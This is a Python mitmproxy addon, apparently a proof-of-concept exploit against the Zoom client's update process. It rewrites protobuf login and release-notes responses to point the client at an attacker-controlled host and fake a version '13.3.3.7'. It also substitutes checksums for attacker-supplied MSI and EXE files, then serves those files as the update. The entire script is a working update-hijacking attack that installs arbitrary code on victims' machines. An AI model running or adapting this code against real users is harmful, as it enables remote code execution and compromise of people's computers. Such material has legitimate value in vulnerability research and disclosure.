import blackboxprotobuf
import hashlib
from mitmproxy import http

mitm_server = 'localhost'

class ZoomMitm:
    def __init__(self):
        self.num = 0
        f = open('Zoom.msi', 'rb')
        self.cab = f.read()
        f.close()
        self.cabmd5 = hashlib.md5(self.cab).hexdigest()
        f = open('Installer.exe', 'rb')
        self.exe = f.read()
        f.close()
        self.exemd5 = hashlib.md5(self.exe).hexdigest()

    def request(self, flow) -> None:
        if flow.request.path.startswith('/client/13.3.3.7/ZoomFull'):
            print('serving cab')
            flow.response = http.Response.make(
                200,
                self.cab,
                {'Content-Type': 'application/octet-stream', 'Content-Disposition': 'attachment; filename="ZoomFull_Sip.CAB"'}
            )
        if flow.request.path.startswith('/client/13.3.3.7/Installer.exe'):
            print('serving exe')
            flow.response = http.Response.make(
                200,
                self.exe,
                {'Content-Type': 'application/octet-stream', 'Content-Disposition': 'attachment; filename="Installer.exe"'}
            )

    def response(self, flow):
        self.num = self.num + 1
        if (flow.request.path == '/clusterswitch') or (flow.request.path.startswith('/login')):
            body = flow.response.content
            message,typedef = blackboxprotobuf.decode_message(body)
            print(message['27']['12'])
            message['27']['12'] = mitm_server
            modifiedbody = blackboxprotobuf.encode_message(message,typedef)
            flow.response.content = modifiedbody
        if (flow.request.path == '/releasenotes'):
            print('Patching releasenotes')
            body = flow.response.content
            message,typedef = blackboxprotobuf.decode_message(body)
            message['10'] = '13.3.3.7'
            message['11'] = 'You are being hacked'
            params = message['12'].split(';')
            for i in range(len(params)):
              if params[i].startswith('Download-root='):
                params[i] = 'Download-root=https://'+mitm_server+'/client'
              if params[i].startswith('Package-url='):
                params[i] = 'Package-url=https://'+mitm_server+'/client/13.3.3.7/Zoom.msi?t=atupg&archType=x64'
              if params[i].startswith('Real-version='):
                params[i] = 'Real-version=13.3.3.7'
              if params[i].startswith('Current-version='):
                params[i] = 'Current-version=13.3.3.7'
              if params[i].startswith('Display-version='):
                params[i] = 'Display-version=13.3.3 (7)'
              if params[i].startswith('fullcab-sum='):
                params[i] = 'fullcab-sum=' + self.cabmd5
              if params[i].startswith('fullsip-sum='):
                params[i] = 'fullsip-sum=' + self.cabmd5
              if params[i].startswith('Installer-sum='):
                params[i] = 'Installer-sum=' + self.exemd5
            message['12'] = ';'.join(params)
            modifiedbody = blackboxprotobuf.encode_message(message,typedef)
            flow.response.content = modifiedbody

addons = [
    ZoomMitm()
]
